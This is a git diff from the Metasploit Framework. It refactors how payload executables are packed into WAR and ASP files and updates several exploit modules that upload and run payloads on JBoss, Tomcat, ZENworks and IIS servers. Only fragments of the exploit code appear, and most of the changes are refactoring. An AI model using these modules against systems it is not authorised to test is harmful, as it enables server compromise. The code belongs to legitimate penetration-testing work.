diff --git a/lib/msf/base/simple/payload.rb b/lib/msf/base/simple/payload.rb index 074ddb0ade..aed76c3082 100644 --- a/lib/msf/base/simple/payload.rb +++ b/lib/msf/base/simple/payload.rb @@ -97,7 +97,8 @@ module Payload plat = Msf::Module::PlatformList.transform(opts['Platform']) tmp_plat = plat.platforms - buf = Msf::Util::EXE.to_jsp_war(framework, arch, tmp_plat, e.encoded, {:persist => false, :template => altexe}) + exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, e.encoded, { :template => altexe}) + buf = Msf::Util::EXE.to_jsp_war(exe, {:persist => false }) else # Serialize the generated payload to some sort of format buf = Buffer.transform(e.encoded, fmt) diff --git a/lib/msf/core/rpc/module.rb b/lib/msf/core/rpc/module.rb index f0b01ad37d..d04651d4b9 100644 --- a/lib/msf/core/rpc/module.rb +++ b/lib/msf/core/rpc/module.rb @@ -216,7 +216,8 @@ class Module < Base output = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe}) when 'war' tmp_plat = plat.platforms - output = Msf::Util::EXE.to_jsp_war($framework, arch, tmp_plat, raw, {:persist => false, :template => altexe}) + exe = Msf::Util::EXE.to_executable($framework, arch, tmp_plat, raw, { :template => altexe}) + output = Msf::Util::EXE.to_jsp_war(exe, { :persist => false }) else fmt ||= "ruby" output = Msf::Simple::Buffer.transform(raw, fmt) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index cd58e96cc9..779bd2854d 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -813,9 +813,7 @@ require 'metasm' # Creates a Web Archive (WAR) file containing a jsp page and hexdump of a payload. # The jsp page converts the hexdump back to a normal .exe file and places it in # the temp directory. The payload .exe file is then executed. - def self.to_jsp_war(framework, arch, plat, code='', opts={}) - - exe = to_executable(framework, arch, plat, code, opts) + def self.to_jsp_war(exe, opts={}) # begin .jsp var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8) diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index 5d2a600834..05f07ab9ce 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -172,9 +172,8 @@ class Metasploit3 < Msf::Exploit::Remote :jsp_name => jsp_name }) else - @war_data = Msf::Util::EXE.to_jsp_war(framework, - arch, plat, - p.encoded, + exe = generate_payload_exe({ :code => p.encoded }) + @war_data = Msf::Util::EXE.to_jsp_war(exe, { :app_name => app_base, :jsp_name => jsp_name diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index a38564d2cc..885b2ca955 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -17,6 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] } include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, @@ -182,16 +183,10 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Using manually select target \"#{mytarget.name}\"") end - # set arch/platform from the target - arch = mytarget['Arch'] - plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]] - # Generate the WAR containing the EXE containing the payload jsp_name = rand_text_alphanumeric(4+rand(32-4)) - war = Msf::Util::EXE.to_jsp_war(framework, - arch, plat, - payload.encoded, - :jsp_name => jsp_name) + exe = generate_payload_exe + war = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name) app_base = rand_text_alphanumeric(4+rand(32-4)) query_str = "?path=/" + app_base diff --git a/modules/exploits/osx/email/mailapp_image_exec.rb b/modules/exploits/osx/email/mailapp_image_exec.rb index 8262eaf6d4..6b547e670e 100644 --- a/modules/exploits/osx/email/mailapp_image_exec.rb +++ b/modules/exploits/osx/email/mailapp_image_exec.rb @@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote # This module sends email messages via smtp # include Msf::Exploit::Remote::SMTPDeliver + include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, @@ -142,16 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote if (target.arch.include?(ARCH_CMD)) cmd = Rex::Text.encode_base64(payload.encoded, "\r\n") else - bin = '' - - if(target.arch.index(ARCH_PPC)) - bin = Msf::Util::EXE.to_osx_ppc_macho(framework, payload.encoded) - end - - if(target.arch.index(ARCH_X86)) - bin = Msf::Util::EXE.to_osx_x86_macho(framework, payload.encoded) - end - + bin = generate_payload_exe cmd = Rex::Text.encode_base64(bin, "\r\n") end diff --git a/modules/exploits/windows/http/zenworks_uploadservlet.rb b/modules/exploits/windows/http/zenworks_uploadservlet.rb index 396ffdd109..e5d792c6c5 100644 --- a/modules/exploits/windows/http/zenworks_uploadservlet.rb +++ b/modules/exploits/windows/http/zenworks_uploadservlet.rb @@ -17,6 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, @@ -55,13 +56,12 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - arch = target['Arch'] - plat = [Msf::Module::PlatformList.new(target['Platform']).platforms[0]] - # Generate the WAR containing the EXE containing the payload app_base = rand_text_alphanumeric(4+rand(32-4)) jsp_name = rand_text_alphanumeric(8+rand(8)) - war_data = Msf::Util::EXE.to_jsp_war(framework, arch, plat, payload.encoded, :jsp_name => jsp_name) + + exe = generate_payload_exe + war_data = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name) res = send_request_cgi( { diff --git a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb index 9f256791d9..b759a87b6a 100644 --- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb +++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb @@ -50,7 +50,8 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # Generate the ASP containing the EXE containing the payload - asp = Msf::Util::EXE.to_win32pe_asp(framework,payload.encoded) + exe = generate_payload_exe + asp = Msf::Util::EXE.to_exe_asp(exe) path = datastore['PATH'].gsub('%RAND%', rand(0x10000000).to_s) path_tmp = path.gsub(/\....$/, ".txt") diff --git a/msfencode b/msfencode index b7b89d04b5..550f92eac6 100755 --- a/msfencode +++ b/msfencode @@ -273,8 +273,11 @@ case cmd asp = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe}) write_encoded(asp) when 'war' - tmp_plat = plat.platforms - war = Msf::Util::EXE.to_jsp_war($framework, arch, tmp_plat, raw, {:persist => false, :template => altexe}) + arch ||= [ ARCH_X86 ] + tmp_plat = plat.platforms if plat + tmp_plat ||= Msf::Module::PlatformList.transform('win') + exe = Msf::Util::EXE.to_executable($framework, arch, tmp_plat, raw, { :insert => inject, :template => altexe }) + war = Msf::Util::EXE.to_jsp_war(exe, { :persist => false }) write_encoded(war) else fmt ||= "ruby" diff --git a/msfpayload b/msfpayload index 1509fcf471..0146facafc 100755 --- a/msfpayload +++ b/msfpayload @@ -156,7 +156,8 @@ if (cmd =~ /^(p|y|r|d|c|j|x|b|v|w)/) arch = payload.arch plat = payload.platform.platforms - exe = Msf::Util::EXE.to_jsp_war($framework, arch, plat, buf) + exe = Msf::Util::EXE.to_executable($framework, arch, plat, buf) + exe = Msf::Util::EXE.to_jsp_war(exe) if(exe)